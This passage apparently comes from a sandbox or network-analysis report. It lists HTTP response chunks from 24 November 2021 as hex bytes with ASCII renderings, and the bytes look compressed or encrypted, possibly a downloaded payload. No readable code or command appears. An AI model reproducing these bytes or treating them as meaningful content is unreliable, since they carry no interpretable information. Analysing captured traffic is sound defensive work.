21 69 38 96 78 91 02 88 ef 65 a6 26
                                            Data Ascii: )zCXG9}4\!/nx,%([E?NF@c[mvb Z>|RFgj4}v_~Ck001CPENs\69&*;3'"Z#rhNTW.GPXNFul3%AV0]&@/>LrNl2Fnkv1Ff_'Y^-xY%!i8xe&
                                            2021-11-24 14:40:42 UTC175INData Raw: c6 c9 33 42 68 5a 87 d4 3d da 46 e0 63 55 59 83 42 5e a3 73 7a 06 30 d4 b9 5b d8 0e a2 f4 be 05 e7 a7 42 f1 6b 3f f6 22 65 e0 9a 6b 42 0a 0a 3a 97 e8 d3 5c 5d 12 e5 df cb 67 e3 ad 90 f9 b7 bd cb 06 2e 0b b7 a9 b4 ea 96 2e f1 bc e1 a0 af 76 22 ef 10 a9 b2 1b dd 1d ab 59 4a 9d 15 85 f0 f9 f4 f1 52 c6 6b cb ec af 56 cc 27 50 15 82 0e 6a eb e1 e1 f5 12 ab 75 e2 b4 2f ef 91 66 72 ba bc 6a f7 33 b2 33 d2 95 bc 31 b4 eb 5c 1f 85 bb fb d1 d3 32 75 33 aa 0e 03 76 4c c6 55 be b0 61 95 33 28 bb 31 21 a4 73 97 45 a6 b4 e6 8b b1 52 9a 57 a8 4c 8e 7d 31 a1 08 ef fe db 41 2b 25 b0 84 55 41 45 ae a4 e3 75 90 05 fa 37 40 7d 64 1d 21 40 51 3d c0 cf 9a 7f 12 64 f2 d6 f6 8e 41 fa ed 03 6a 20 06 e1 86 78 b6 0b 9f 8a bf 56 7e 7c c6 e9 3a c8 24 4b ad 77 45 4e 4d de 9c 24 ce a4
                                            Data Ascii: 3BhZ=FcUYB^sz0[Bk?"ekB:\]g..v"YJRkV'Pju/frj331\2u3vLUa3(1!sERWL}1A+%UAEu7@}d!@Q=dAj xV~|:$KwENM$
                                            2021-11-24 14:40:42 UTC176INData Raw: f4 82 2a ad 79 f2 23 41 97 83 a6 54 b4 cd 4f 6b 42 b7 cf ce f7 d1 fc 75 3d 19 48 0f 5f 4f 35 5c 14 b7 29 60 42 d7 3a 26 7f ec c7 a9 fb 15 25 4e ba 8f a4 4a ed cc 59 c6 a6 43 d2 5b 98 d3 87 35 72 21 5f 3b ef 66 58 d3 6c cd 76 5c c6 9b 0f c1 4b 43 fc 84 33 db b1 0e c8 1a ee e2 69 a1 b3 39 1b 97 97 26 7c 76 d4 c9 68 bf ea d7 85 6e ac e5 86 87 43 50 45 d8 1d 03 d3 06 b9 21 a6 7c 5f b8 38 26 da 5c 4c 01 b3 65 28 7b a3 15 45 ac a3 5a e7 b5 db 4e fb 75 b3 74 c0 cb 6a e7 d2 f3 4e c2 31 4e d0 b1 de 2d b2 bf 56 8b 4f af 46 77 db aa 35 8b cf d6 a0 27 c7 5b 0c 41 56 a6 07 ef 0a 83 20 8d 5e fe 96 57 a1 0f 4c 72 64 93 dd 44 8c e8 1d 08 42 4f c4 97 6e 60 84 1d fb d6 83 cc 7e 10 47 7f ef 15 66 64 13 c0 12 05 f4 06 55 bf b3 d4 99 f8 5e 57 94 18 7e fc 9c c1 0c 10 49 b7 20
                                            Data Ascii: *y#ATOkBu=H_O5\)`B:&%NJYC[5r!_;fXlv\KC3i9&|vhnCPE!|_8&\Le({EZNutjN1N-VOFw5'[AV ^WLrdDBOn`~GfdU^W~I
                                            2021-11-24 14:40:42 UTC177INData Raw: 3f e4 8b 78 36 04 73 6d 17 6f 7c a1 d4 ef 43 68 5a 11 c2 63 4c a1 f2 15 28 d0 4a 9e 5f a3 73 ec 10 8c 45 5e ef a1 73 08 69 63 04 e7 a7 d4 e7 da a9 11 7e 13 9d 56 8a 9f 0b 0a 3a 01 fe e3 4d bc e4 93 a2 25 5a 01 ac 90 f9 21 ab 28 11 cf 57 c1 d4 a4 9c 74 2f f1 bc 77 b1 c9 e6 c5 46 47 d4 83 49 3e 1c ab 59 dc 8c 40 10 17 30 a3 8c 00 cc 8b ca ec af c0 da 0f 4e f4 90 78 17 9f 7f 08 f4 12 ab e3 f4 38 e9 08 18 0b 0f 2c e2 84 f6 33 b2 a5 c4 80 21 d6 c8 bd 21 a7 5f 49 fa d1 d3 a4 63 8a be ef 7f 20 31 1c ef 9e b0 61 95 a5 2e cd 0b e2 b5 0e ea b9 f8 45 e7 8b b1 c4 8c b4 3d ab 54 2b 4c bf d3 19 ff db 41 bd 33 28 07 b2 b3 13 d3 9b d8 81 91 05 fa a1 56 70 71 fc 29 11 2c 5d 47 3a 9b 7f 12 f2 f4 32 cd 4d 60 a4 90 82 c5 d5 07 e1 86 ee b0 52 b2 49 ec 07 03 de 51 13 3b c8 24
                                            Data Ascii: ?x6smo|ChZcL(J_sE^sic~V:M%Z!(Wt/wFGI>Y@0Nx8,3!!_Ic 1a.E=T+LA3(Vpq),]G:2M`RIQ;$
                                            2021-11-24 14:40:42 UTC178INData Raw: 29 02 50 c5 03 7c 17 d2 47 3a 9a 64 8c f0 15 d1 ef da 1a c5 eb c2 09 05 0e 09 72 9d 41 0b 93 0b bf 72 4d 26 b1 60 4d ef d2 38 7d 59 8c 35 eb 74 1f 51 c8 9a 2e b8 d5 8a 75 81 1c 24 92 cf a7 9d 1b 11 e6 88 de 58 f6 59 45 9c 4d 4a 07 a4 38 ca 9b b7 c7 3d 3a 31 94 96 81 36 6a 13 a1 3b 9f c3 9d 4e 95 63 d3 6d 94 6e a5 7c a2 d5 c5 32 48 3c fe df ff 58 5f e1 8f d6 ff 14 ca eb 34 9a 5e 18 a1 a5 d7 3b 01 3c dd 03 b3 3f ee 6d ec 4b d1 c9 9e 17 12 7c c6 4f ed e7 6a bc 85 bf 3d fd 52 f2 68 28 59 d1 9c 64 b7 95 78 6d 30 91 ad ef dc 73 a2 f2 61 ca e5 41 40 9a 6b 5c e2 7e 6e 9d 9a 11 9d 88 1e dc 95 83 d3 5c 4c e4 ee a2 cb c1 03 54 92 1f b5 d6 cb 28 3f 57 bc d4 b4 04 76 c8 e4 5a e3 cc af bb 35 46 3a d4 b2 d1 3c 3e a8 bf 48 f1 15 6e e7 30 de 8c 52 54 89 20 fa 49 54 a7 27
                                            Data Ascii: )P|G:drArM&`M8}Y5tQ.u$XYEMJ8=:16j;Ncmn|2H<X_4^;<?mK|Oj=Rh(Ydxm0saA@k\~n\LT(?WvZ5F:<>Hn0RT IT'
                                            2021-11-24 14:40:42 UTC179INData Raw: e9 bd b3 be 57 ef 76 da 55 94 ca 88 9e 1f 09 16 b0 ee 9e 1d 19 64 ab 88 4b 1b 72 a2 f9 8e 4a 8d 2a c4 0a d3 1a c8 32 28 4f 3f 22 9b 8d ee 4a af 8b 88 5e 46 33 ba 70 ee a1 33 8e f7 d8 af 4c bf 28 1c 85 17 34 73 64 36 fd 9f 86 ac 5f da e0 97 6b b0 fe d6 f0 78 46 96 89 e2 94 09 05 2d 82 72 00 32 c9 bd 27 25 1c 0f e7 8c 38 5e a5 26 e4 51 e7 07 c7 ac c0 b5 96 2b 30 7d 3d 29 1e b1 d5 6e b4 58 d7 3b aa 78 f4 a3 29 c7 4c 5a 6b 94 51 ee 42 f8 2a 87 f6 70 1e 4b 7b 19 23 16 b4 67 a4 29 b4 ec 4d 25 43 51 cd 25 f7 b9 ca 91 3f 64 48 4b 5d e7 33 ba 16 5c 29 a5 62 33 38 5b 7f 94 c5 34 fa f3 27 a5 ba 5d 92 ae ef b1 59 5a a5 5f d5 bd 9a 38 87 56 53 c5 5d 46 ef d6 5b 00 6d 2b 74 b7 c6 e9 38 25 49 3e fc 50 30 8d b6 e8 ca f1 ee 71 48 45 b1 44 1b 5c 94 da 7d 90 d6 22 68 8d de
                                            Data Ascii: WvUdKrJ*2(O?"J^F3p3L(4sd6_kxF-r2'%8^&Q+0}=)nX;x)LZkQB*pK{#g)M%CQ%?dHK]3\)b38[4']YZ_8VS]F[m+t8%I>P0qHED\}"h
                                            2021-11-24 14:40:42 UTC180INData Raw: da 23 fb 05 f0 12 e8 b7 26 ce 8a 56 7f 81 d3 15 7e 17 d2 d1 ac b3 0c 6b 14 6a ac 1d aa 0c c7 eb c2 9f 93 cf aa 92 79 3e 76 87 58 a9 70 4d 26 27 f6 11 52 35 dc 02 24 ba b8 fd 76 1f 51 5e 0c c5 a7 34 6e 0a fc 44 cb 84 cd a7 9d 8d 87 20 67 39 bc 89 24 3f 55 5b 48 07 a4 ae 5c 87 e3 26 d9 45 4c 08 bd 96 34 6a 13 37 ad 58 1d 7a aa ea 1e 6d 68 83 6c a5 7c 34 43 83 e5 a9 d8 81 a2 1f 3f 48 e3 8f d6 69 82 c4 b1 d0 7e 21 65 a0 e7 c0 39 01 3c 4b 95 c3 3a 02 89 93 36 f3 69 89 15 12 7c 50 d9 0a 73 8e 58 fa c2 7e 63 45 f0 68 28 cf 47 34 5a 45 71 07 10 54 6d ba ed dc 73 34 64 70 35 01 a5 3f e7 ed 86 f5 7c 6e 9d 0c 87 4f 0e ec 38 ea fe 7b 64 58 e6 ee a2 5d 57 38 9d 76 fb ca ab 01 3e 2b 55 bc d4 22 92 5a 29 17 be 9c b1 44 cf 21 44 3a d4 24 47 2c 2e 4d 5b 37 8c 18 3d f3 32
                                            Data Ascii: #&V~kjy>vXpM&'R5$vQ^4nD g9$?U[H\&EL4j7Xzmhl|4C?Hi~!e9<K:6i|PsX~cEh(G4ZEqTms4dp5?|nO8{dX]W8v>+U"Z)D!D:$G,.M[7=2
                                            2021-11-24 14:40:42 UTC182INData Raw: 50 3c d7 5c 0c 1f d1 a3 0a 2b aa 15 ea 91 bc 57 ef e0 4c cb 73 1c 6c e1 62 14 bf 92 ec 9e 1d 8f f2 18 3a a8 ff 0d df c6 05 68 8f 2a c4 9c 45 f2 c5 e5 cc 30 42 43 76 af ec 4a af 1d 1e 77 90 d0 5e 0f 93 23 fc ac f5 d8 af da 29 3a 20 52 f3 4b 0e c0 17 de 9d 86 ac c9 4c 5d a4 8b 54 81 ab 36 78 65 94 89 e2 02 9f 39 24 56 96 7f 4f 21 df 04 27 1c 0f 71 1a 47 16 45 c2 9b 2c ed 40 e4 ae c0 b5 00 bd 40 e9 e9 cd 61 cc fe cb 97 5a d7 3b 3c ee fb fe c9 23 33 27 27 6e 72 ec 42 f8 bc 11 6c 84 cc af 04 64 4e cd 97 65 a4 29 22 7a 62 48 a4 b5 b2 58 79 80 ea 93 3f 64 de dd 99 49 d3 5e 69 21 99 ba 42 31 38 5b e9 02 9a 8a 1d 17 58 d8 6b 20 b2 ac ef b1 cf cc 4b 45 34 59 e5 45 75 05 73 c7 5d 46 79 40 27 f5 8a cf 0b ca d5 59 18 27 49 3e 6a c6 2f dc 57 0c b5 8c da e7 68 47 b1 44
                                            Data Ascii: P<\+WLslb:h*E0BCvJw^#): RKL]T6xe9$VO!'qGE,@@aZ;<#3''nrBldNe)"zbHXy?dI^i!B18[Xk KE4YEus]Fy@'Y'I>j/WhGD
                                            2021-11-24 14:40:42 UTC183INData Raw: 93 60 df 94 99 08 19 cc 12 0b 9d f4 21 fb 05 66 84 f6 2b c4 2a f5 2b 30 15 fd 17 7e 17 44 47 69 98 cb 8f 6b 17 dd aa 84 0e c7 eb 54 09 e9 1a 48 76 06 43 e4 d6 77 ab 70 4d b0 b1 19 4f 95 d1 a3 7f 90 c9 97 ff 76 1f c7 c8 a6 3a 45 d0 11 77 2a 59 e4 86 cd a7 0b 1b 9e e5 a0 dd c3 f4 dc 00 7a 59 48 07 32 38 57 8d 00 c2 a6 38 55 d2 92 94 34 6a 85 a1 e0 9c de 9e d5 97 24 95 47 81 6c a5 ea a2 48 d2 06 4d a7 fc f9 b9 10 4a e3 8f 40 ff f5 c9 7a 34 01 5c 19 e7 cb c2 39 01 aa dd dd a4 d9 e6 f6 ee a8 97 45 8b 15 12 ea c6 78 ee a5 6a 27 87 02 7b 4f 47 f0 68 be 59 f1 8b b9 a1 0e 7a f2 76 41 b8 ed dc e5 a2 8f 62 e2 e5 da 42 e3 2c aa f7 7c 6e 0b 9a ab 84 ed 08 47 97 d8 94 48 5a e6 ee 34 cb 42 07 4a 92 84 b7 e3 8c 12 29 55 bc 42 b4 52 6c c9 f3 c1 e1 d8 e8 e3 23 44 3a 42 b2
                                            Data Ascii: `!f+*+0~DGikTHvCwpMOv:Ew*YzYH28W8U4j$GlHMJ@z4\9Exj'{OGhYzvAbB,|nGHZ4BJ)UBRl#D:B
                                            2021-11-24 14:40:42 UTC184INData Raw: 2a 7c b0 80 d4 d6 61 b6 ea b6 b7 50 3c 41 ca 7d 5c 20 47 75 56 d4 b8 d0 93 bc 57 79 76 a8 61 96 f8 13 9c c2 58 84 90 ec 9e 8b 19 8f aa cb 4c 80 70 1d a8 3e 6a 8f 2a 52 0a 8e 1c 20 01 b3 4d a1 73 4d ad ec 4a 39 8b de 5f 6f 34 21 72 96 f3 c7 ae f5 d8 39 4c 16 2f c2 b6 8c 36 29 36 2c dc 9d 86 3a 5f be e1 58 6f 2b fc e3 a2 43 67 94 89 74 94 ea 02 c6 b2 e9 02 25 9b e4 06 27 1c 99 e7 7e 3a eb a1 bd e6 a7 b5 78 e6 ae c0 23 96 9d 39 0b 0d b2 1c 61 87 f3 95 5a d7 ad aa 75 f6 38 2d 5c 4e e9 39 56 70 ec 42 6e 2a 58 fd 66 28 d0 79 8b 71 f5 95 65 a4 bf b4 b2 4f 8f 40 ca cf 48 a4 b8 e8 93 3f f2 48 a0 49 ab 37 21 14 10 7a 82 40 31 38 cd 7f f0 c7 4d f9 68 25 8b e9 18 b0 ac ef 27 59 61 b1 a7 d0 26 98 31 d4 3d 71 c7 5d d0 ef 5c 58 37 6e b0 76 5f 95 60 1a 27 49 a8 fc c8 26
                                            Data Ascii: *|aP<A}\ GuVWyvaXLp>j*R MsMJ9_o4!r9L/6)6,:_Xo+Cgt%'~:x#9aZu8-\N9VpBn*Xf(yqeO@H?HI7!z@18Mh%'Ya&1=q]\X7nv_`'I&
                                            2021-11-24 14:40:42 UTC186INData Raw: 8c 78 43 af 26 33 74 d1 00 84 b6 05 f6 0a 27 7d ec 66 b1 a1 78 da f6 21 fb 93 f0 e0 ed c6 20 55 88 fe 22 52 ff 17 7e 81 d2 9c 9c 7c 2f f0 16 e0 f1 ed 86 0e c7 7d c2 87 96 e8 ac 09 7b 5b 28 91 75 ab 70 db 26 b4 c7 ab 71 ae de 45 7a 8e 95 ff 76 89 51 0e 09 c8 a1 af 6c 2b a2 1e e6 86 cd 31 9d 34 b6 00 44 a2 be 8a 7a 47 78 59 48 91 a4 18 5a 7d e4 bd db 98 12 96 90 94 34 fc 13 a2 9f 79 3a e1 a8 56 40 d1 45 81 6c 33 7c e8 45 23 e2 32 da 1e fc fd 12 4a e3 19 d6 b4 b0 2c 9e 4b 7c 58 3a a3 c9 c2 39 97 3c a9 93 55 3d 99 8b c8 69 d3 47 8b 15 84 7c 21 ed 0b 41 15 5a cf 9d 3f 4d 47 f0 fe 28 d9 46 7a 5d de 73 10 4f 32 43 b8 ed 4a 73 6c 62 87 06 9a a7 ce b8 69 a8 f7 7c f8 9d 59 86 7b 09 77 3a 39 a1 d1 4a 5a e6 78 a2 89 50 e5 ae ed f9 78 f4 c9 10 29 55 2a d4 41 93 90 2d
                                            Data Ascii: xC&3t'}fx! U"R~|/}{[(up&qEzvQl+14DzGxYHZ}4y:V@El3|E#2J,K|X:9<U=iG|!AZ?MG(Fz]sO2CJslbi|Y{w:9JZxPx)U*A-
                                            2021-11-24 14:40:42 UTC187INData Raw: dc 48 24 f7 76 59 cb 79 d9 c2 06 cc 36 83 67 8b a6 87 e8 12 b4 6f 7b d6 d5 0b 0c 74 e3 56 08 5f ab c7 f7 62 be 96 ef df 44 a2 72 3b 6e ec 6a f7 87 51 ec 3e 05 e7 f0 6a 2d 60 d2 63 df e8 3d 1d 9a 29 c7 13 44 b9 ed 09 cd 54 43 c1 7c a2 ef 63 ae 28 35 54 8a 07 5d 3e 85 7a c7 67 f5 af 88 5a 2a e1 24 cd fd 2a 0d 5d 2f 68 91 cf ad 96 4c 6d a7 7e 56 bd aa 48 65 45 97 c8 e3 32 bb 83 20 99 95 ca 5f e1 e5 2f 26 8b 3c ca 19 11 0c 07 e7 d2 2f b6 7b 7b 8d fc b6 4f bd 9c df 4f cc c5 cc b5 e2 d2 59 0e 3b c0 fe e7 de 4e 20 51 3c 61 57 11 ed 45 db 67 12 9f 81 b0 b2 ff 64 52 f6 bb 40 b7 29 d5 7b c8 7c 1b b4 4e 59 fd aa b6 90 be 65 b0 f6 39 4e bc 5d c0 05 60 81 d1 30 97 50 15 01 7c aa 72 05 a1 db 7b 1b cb 84 64 b2 c0 cd ce 69 43 58 01 44 0a 2c 8f c6 c4 47 1c 6f c3 d2 f5 cc
                                            Data Ascii: H$vYy6go{tV_bDr;njQ>j-`c=)DTC|c(5T]>zgZ*$*]/hLm~VHeE2 _/&</{{OOY;N Q<aWEgdR@){|NYe9N]`0P|r{diCXD,Go
                                            2021-11-24 14:40:42 UTC188INData Raw: 0c 33 44 72 28 b8 3b 1f 5e d8 94 40 9e 45 da 14 ab f8 d1 4d 90 8e 9a 3f df b4 90 d0 12 88 11 0b fd 6e 22 1a 06 3d a9 aa 29 1b 2b 88 1f 51 51 16 14 27 37 82 4e 45 99 53 80 5f 16 05 ef f1 2a 8e ea 6b 09 0b 1b d5 7d 52 43 ca 9a f5 a2 81 4e 99 ae d3 49 82 d0 40 60 01 88 94 fb f3 0a 18 c9 fd 2d d4 c5 49 73 0d 1f 48 99 e8 a3 34 1b 04 c5 0f de 5f f7 e9 68 e5 50 f9 07 20 38 98 92 57 c0 4c 38 87 9d 99 90 a3 59 c1 a8 1c 9f bd 89 1e 93 f7 d1 f4 8b c4 a0 95 a0 cd d0 3f 46 8e fc 8c f7 90 4d 0a 8d 58 ea 65 c3 35 36 d0 74 bc a4 98 c0 17 24 80 d9 3c b3 3d c8 a0 e4 ba d1 b2 b9 2c 18 f0 c6 5b f7 7c 62 f3 87 47 28 04 46 61 69 bf 59 01 96 56 a7 e4 49 5b 3a 5a bc c3 f9 cf a6 55 65 26 f1 3b 48 c6 6f 86 d2 c0 6a 0c 9b ac 8e a8 00 13 93 d0 f6 59 5a df ea 8c ee 44 03 e5 94 5d 85
                                            Data Ascii: 3Dr(;^@EM?n"=)+QQ'7NES_*k}RCNI@`-IsH4_hP 8WL8Y?FMXe56t$<=,[|bG(FaiYVI[:ZUe&;HojYZD]
                                            2021-11-24 14:40:42 UTC189INData Raw: 7b fe 2e e9 22 65 ee 67 35 7f 58 fd e9 e4 2f 6c bf 1e 5e 9e 97 22 2c 60 96 2a c0 9a 67 fc 9e 27 b0 61 3a 55 d0 5f 4c ff 43 73 66 e3 e8 db 97 8d 43 6b 60 95 55 27 e9 9e 8a 83 0b bb 85 37 9c b4 19 30 82 0f 59 6c 74 14 fe 1b 7d 26 2a a7 1e cd 0d 6f 03 a0 7f 81 35 1e ac bb 59 67 9c 5f 58 01 3f 93 65 da a7 4c 8a 02 cf 3e 4d ac 3d ff b6 60 37 99 64 6f c4 0c 82 51 5a a9 f5 17 6d 35 e8 04 e8 e8 67 4d a4 0d 8c 8e 04 5d 9c 51 07 de c8 6a 27 c2 09 6e e1 34 1d 1e a3 21 e7 02 c2 68 fc bf c1 d4 8e e2 36 fc 0e 92 36 93 d3 b0 97 d7 f3 09 ae e7 f1 cb 3b 32 4e 26 6e 82 52 5d 58 89 2c f8 d8 58 29 dc 7f a8 0a 40 8f cc a4 07 91 b8 57 50 41 d6 c6 54 ec 0b e8 b2 3e 7a 53 21 5d 63 10 4f 14 25 28 ae 65 49 3f a7 7f 2c cd 29 fc e9 25 09 94 34 b1 fd ee 54 57 f0 a6 bd d2 d9 82 33 81
                                            Data Ascii: {."eg5X/l^",`*g'a:U_LCsfCk`U'70Ylt}&*o5Yg_X?eL>M=`7doQZm5gM]Qj'n4!h66;2N&nR]X,X)@WPAT>zS!]cO%(eI?,)%4TW3
                                            2021-11-24 14:40:42 UTC191INData Raw: d5 58 fb b8 ed 69 0c 9c 1a 4f b2 ea 9f 84 b2 0e 4c 2b 96 a7 96 a4 85 b8 41 fb 27 cc 19 3b 03 4d b1 c3 e3 11 08 e2 eb 99 ab a9 02 c9 f7 81 d7 c0 f5 55 ef a9 32 f6 af 9a 7f d5 ea f3 59 ce d5 ce bc 76 0a 6c 11 39 89 2f 86 ef c0 21 e4 07 97 27 ac 89 5d 46 5e 7a 72 29 6a 46 0e 40 f1 7f 60 4a d9 56 26 0e 8f df 72 0e 53 b8 1c 3d a3 bb 6f e1 d0 9c ea df cc 22 88 d5 83 a2 47 f1 9b e7 24 09 79 77 6d 14 a4 11 5d 88 ee 7e f3 81 4b 7b 89 37 37 d3 14 83 be 5a 10 d8 a9 b9 16 51 42 c5 6d c3 4e 78 44 89 e1 9e f4 d2 a3 f6 16 36 cc 46 fe ab 83 e4 b9 f6 77 10 64 8f c1 40 3e 08 38 5c 85 6e 17 b8 8a 3f 18 ff 46 d7 14 90 66 b0 df b1 42 46 52 05 c5 61 4c 69 d5 7b 28 60 44 43 74 38 5a 43 13 4c 55 96 ec e5 70 16 77 c2 2d bb a6 54 c2 ac af 93 7d c6 b3 0a 87 f9 0a 35 0a b2 fa d2 4e
                                            Data Ascii: XiOL+A';MU2Yvl9/!']F^zr)jF@`JV&rS=o"G$ywm]~K{77ZQBmNxD6Fwd@>8\n?FfBFRaLi{(`DCt8ZCLUpw-T}5N
                                            2021-11-24 14:40:42 UTC192INData Raw: e1 0e 7d f6 11 b9 af 62 7f 39 63 56 11 ab cd 1c 67 c3 74 a1 5b 63 f2 c8 24 5c 5d 7c c9 56 d8 1a 1c b3 18 ac 66 75 bc c3 c6 95 b4 1c 47 fd fb 8a 0c 71 c6 00 08 16 aa fa d2 8e bc 14 ef 65 4c 48 70 b9 6e 87 62 25 86 d9 ec ed 1d c2 f2 c8 2d 55 fd 5c df 9a 3c 79 8f 37 c4 63 45 69 c6 f7 ce cd 42 09 4f e8 ec c9 af 90 1e 72 89 b5 5c 09 93 e4 c5 2d f5 5b af 09 29 a1 24 c7 f1 30 0f c4 2e f7 9d c3 ac fe 4c 2b be 28 56 5d ab 23 41 22 94 2a e2 87 9f 18 20 13 94 c1 4f b7 e7 c6 27 37 0f a2 1a fb 0d 40 c0 e5 2e 24 7a f5 ae dd b5 76 bd 1b ed 4a cf ff cc 56 f1 d0 5a d7 3a 81 ee b1 de 2f 20 5d 27 76 54 50 ed 51 f8 37 11 d6 81 01 ad 3c 64 63 f6 be 65 e1 29 f4 7b 5e 69 5f b7 af 59 e4 ba f5 93 5f 65 63 dd 18 4d b5 5d 3f 21 6c 80 e0 30 13 5b 3a 02 05 aa d0 15 60 d8 7a 1b a3 ac
                                            Data Ascii: }b9cVgt[c$\]|VfuGqeLHpnb%-U\<y7cEiBOr\-[)$0.L+(V]#A"* O'7@.$zvJVZ:/ ]'vTPQ7<dce){^i_Y_ecM]?!l0[:`z
                                            2021-11-24 14:40:42 UTC193INData Raw: 66 20 06 f8 08 e3 f6 42 4b c6 a9 d6 99 5e 51 0d 89 2d 65 a3 bf 89 12 9d 4d 83 3c ab 36 96 6e ef 9b b3 80 41 d2 d5 ae eb dd 00 84 e7 8c 34 d1 0c 9b 09 29 61 0f 25 d8 23 29 c1 1b f0 84 8b 28 18 36 88 2b 7b 44 ce 08 7e 17 fc 4e a4 84 2d 8d b6 3f bb cc 86 0e ae c4 0e 14 93 0e f6 50 66 60 76 93 66 b7 b2 43 26 b1 48 66 9d fb de 7f eb 83 21 d6 76 1f 97 e5 c0 33 a3 d2 93 5d 46 35 e6 86 de a0 a8 05 87 e6 12 d2 7c fa 24 45 a2 50 8a 09 a4 38 94 98 24 ce db 38 f5 b7 52 9a 36 6a 17 a1 ae 9f 3a 9c ad 97 1b d3 47 81 6a a5 7b a2 41 c5 e7 4f d3 fc a0 ff 1d 4a e8 8f d4 ff 96 ca 91 36 7d 5c 70 a1 c4 c2 3b 01 2a dd 9a b3 3e e4 9c ee 39 d1 45 8b 68 12 6d c6 db ed 3d 68 49 87 c3 3d 32 47 e3 68 2a 59 59 9d 4a a3 72 7a 0f 31 56 b8 ef dc 53 a3 73 61 05 e7 86 43 f0 6b aa f7 5e 6f
                                            Data Ascii: f BK^Q-eM<6nA4)a%#)(6+{D~N-?Pf`vfC&Hf!v3]F5|$EP8$8R6j:Gj{AOJ6}\p;*>9Ehm=hI=2Gh*YYJrz1VSsaCk^o
                                            2021-11-24 14:40:42 UTC194INData Raw: dc 68 47 12 45 70 ca 95 24 d8 77 bf 5f 6a 43 59 30 ea 13 ad 9d 23 84 2e 50 47 4e f2 6a bf e0 ba 5c 56 e9 33 ba 3a 26 2b cb 3d 38 a5 83 d8 07 d2 ba 44 ae 5b 5b 94 23 da dc 01 92 c2 09 c2 00 93 e4 a7 f3 4f 54 ca 2c b2 57 de 50 4e 59 22 89 4e af bb e0 ac 76 34 6d 33 aa d9 25 c2 59 f3 40 2f 30 05 45 31 67 59 f0 5f e0 b6 57 da 0f 4e e4 41 97 a4 a2 8f 95 3b 30 3b 4d c6 97 49 f4 fb 6b e0 30 a9 b3 01 46 41 7d c6 17 e7 f2 12 f0 3c e1 77 7b 4f ce ef d4 d2 fc 45 c1 1a 2f 2e 1e af bc 32 9e f8 b1 11 69 78 95 d9 95 a4 89 dc 42 6b 22 93 29 97 03 3f b2 a7 f6 ab 0f a7 ed 22 b1 6a 26 77 f6 6c fb 45 f4 2b e8 79 22 7e 91 59 7f d2 e6 6f 67 76 cb 29 b5 ca 2d c6 0f 7d ac 9e 86 76 c7 94 c2 5a 92 e4 af 85 7a 25 70 fd 73 e1 77 17 21 d0 f1 22 74 63 d9 ae 23 a6 9d ce 7c 5a 5a db 1c
                                            Data Ascii: hGEp$w_jCY0#.PGNj\V3:&+=8D[[#OT,WPNY"Nv4m3%Y@/0E1gY_WNA;0;MIk0FA}<w{OE/.2ixBk")?"j&wlE+y"~Yogv)-}vZz%psw!"tc#|ZZ
                                            2021-11-24 14:40:42 UTC195INData Raw: 4d 30 72 b5 dc 23 50 79 d9 39 7b 8c 5c 5e 98 41 aa ec 63 c2 c1 87 ad ec 05 92 66 73 23 a0 05 56 8f 07 6b 84 7b 98 47 f4 df 8e 9c 74 13 63 89 de 86 bb 5a d1 41 ab e6 44 56 be ee 76 76 3f 78 c8 d1 a6 41 06 41 8f 3b 7d 0f 54 a7 85 c9 f9 0f e1 00 1c a3 4b 6b e2 3a 84 31 c5 75 e7 d9 d4 33 e8 1e 51 39 65 64 4c f5 b3 52 91 af 72 19 33 fb 76 2d e7 0f bf d1 b2 d3 f0 6c 88 57 64 7d 36 73 48 18 45 52 26 59 e9 06 72 56 f4 97 b8 98 62 8d ff 56 83 b9 73 d7 b2 78 e2 76 d0 cb a7 14 77 4a 6a 11 6f a7 6d 25 bf 42 01 5e 13 9a d4 24 18 64 8c f9 3e ed b9 3d 07 77 c1 56 e6 86 55 d8 89 87 9a 11 0b e5 fe 21 6d 80 71 31 66 9a de e5 a7 8d 12 da 76 1e 30 11 9e 3b d5 0c 7d b7 a6 ec ca 72 4c bb c5 59 7f cb 70 8d 9c 5d 0e c6 44 b0 3b 73 1a 92 6c 87 23 36 13 79 ad a4 07 ee c8 4d 16 c8
                                            Data Ascii: M0r#Py9{\^Acfs#Vk{GtcZADVvv?xAA;}TKk:1u3Q9edLRr3v-lWd}6sHER&YrVbVsxvwJjom%B^$d>=wVU!mq1fv0;}rLYp]D;sl#6yM
                                            2021-11-24 14:40:42 UTC196INData Raw: 2c 6a fc a0 64 d9 d6 5a c8 ce bb dc 29 12 b1 00 4e ca d1 71 7c 30 81 5f 2f 16 fc 79 d2 13 cd c8 85 e7 16 50 26 1b 1d 0f 85 e0 de 09 a6 8e 09 ba 5f 73 da 88 1a 38 e7 d5 2a 42 f5 ba 03 f8 a3 1c b1 23 9c 8a f8 db e7 09 a7 65 1d ba 9b a5 4e 27 54 59 98 1e 8a 50 d3 0e 55 eb 19 af 25 b7 db 12 60 6d a8 fd a0 43 95 59 6b 17 56 72 50 45 51 32 22 b4 09 e0 d7 02 a1 49 1b e4 23 c2 d9 ea d9 95 7c 65 46 2f 93 97 0d a1 84 0f b6 30 e4 e6 7e 20 14 7d 88 42 66 97 51 a2 5e a5 81 1f 3a 8a cf b8 de 81 19 9b de 7a 2c 53 e4 e9 4f eb 0b f3 78 1a 60 fe 39 91 d6 e1 ec 16 d2 6b cd 5f b6 46 ed da f6 b3 a7 5b 9b ac 43 b1 51 7d d8 b2 79 fb 40 a8 84 ae 78 22 6f d0 2b 37 08 ff 76 26 17 b0 1f ac f9 75 8d 72 4f ac 8a de 0e a1 b3 c2 6e cb 0e ec 2d 7b 00 2f 93 31 f2 70 08 7f b1 b0 14 73 94
                                            Data Ascii: ,jdZ)Nq|0_/yP&_s8*B#eN'TYPU%`mCYkVrPEQ2"I#|eF/0~ }BfQ^:z,SOx`9k_F[CQ}y@x"o+7v&urOn-{/1ps
